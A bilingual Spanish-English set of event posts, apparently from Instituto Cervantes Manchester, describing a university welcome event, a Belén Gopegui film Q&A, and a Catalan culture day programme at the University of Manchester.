Hola a todos/as,

El Instituto Cervantes siempre se complace de recibir a los estudiantes universitarios. Como cada año, nuestro Salón de Actos acogió el 30 de septiembre el acto de bienvenida a más de cien alumnos de la Facultad de Estudios Españoles, Portugueses y Latinoamericanos (SPLAS, por sus siglas en inglés) y del Centro para Estudios Latinoamericanos y Caribeños (CLAC), ambos de la Universidad de Mánchester.

El nuevo director del Instituto Cervantes de Mánchester, Francisco Oda, inauguró el acto seguido de los profesores que impartirán clase durante este curso.

El Instituto Cervantes celebra el entusiasmo de los jóvenes universitarios por el estudio de lo español, portugués, latinoamericano y caribeño. ¡Mucha suerte a todo el alumnado y profesorado!

Instituto Cervantes is always glad to receive university students. Just like every year, our Great Hall held on the 30th September the welcome act to more than one hundred students at the Spanish, Portuguese and Latin American Studies (SPLAS) faculty and the Centre for Latin American and Caribbean Studies (CLAC), both from the University of Manchester.

The current director at Manchester’s Instituto Cervantes, Francisco Oda, gave the welcome speech followed by the teachers that will be teaching during this school year.

Instituto Cervantes celebrates the enthusiasm of the university students for Spanish, Portuguese, Latin American and Caribbean studies. Good luck to all the students and teachers!

La escritora Belén Gopegui (Madrid, 1963) asistió el miércoles al Instituto Cervantes de Mánchester para participar en un Q&A que tuvo lugar tras la proyección del filme ‘Las razones de mis amigos’ (Friends Have Reasons), basada en la novela de Gopegui ‘La conquista del aire’. El acto se enmarca en un programa elaborado en colaboración con las universidades de Mánchester, Sheffield y Liverpool. El Instituto Cervantes desea agradecer la atención de Belén Gopegui, así como la dedicación de todas las personas que han hecho posible su visita.

Writer Belen Gopegui (Madrid, 1963) came last Wednesday to Manchester’s Instituto Cervantes to take part in a Q&A that followed the screening of ‘Las razones de mis amigos’ (Friends Have Reasons), based on the novel by Gopegui ‘La Conquista del Aire’. This event belongs to a programme arranged along with the Universities of Manchester, Sheffield and Liverpool. Instituto Cervantes wishes to thank Belen Gopegui for her kindness, as well as the dedication of everyone involved in Gopegui’s visit.

Nuestros amigos de la Universidad de Manchester organizan una jornada de cultura catalana, en el que se mezclarán conferencias sobre deporte y cultura con música en vivo, degustación de productos catalanes y sesiones de prueba del catalán.

Programa:

10:00 – Discurso inaugural y bienvenida: Profesor Keith Brown, Vicepresidente y Decano de la Facultad de Humanidades y Sr. Àlez Susanna, Director del Instituto Ramon Llull de Barcelona.

A continuación: Conferencia a cargo de Sr. Carles Vilarrubí, Vicepresidente del FC Barcelona – «Barça, deporte, cultura y educación» (Auditorio Samuel Alexander)

11:15 – Degustación de productos catalanes (cortesía del Patronato de Turismo de la Costa Brava – Pirineu de Girona) y exposición de posters y obras de los estudiantes de catalán en Manchester y North West (Hall Norte Samual Alexander)

12:00 – Conferencia a cargo de Dr. Louise Johnson, Catedrático y Director de Estudios Catalanes de la Universidad de Sheffield – «Cultura deportiva e identidad nacional a través del fútbol y los Juegos Olímpicos» (Auditorio Samuel Alexander)

13:00 – Concierto de la mano de Clara Sanabras Trio (Auditorio Samuel Alexander)

14:00 – Sesión de prueba de catalán (Edificio Mansfield Cooper, Aula 2.03)
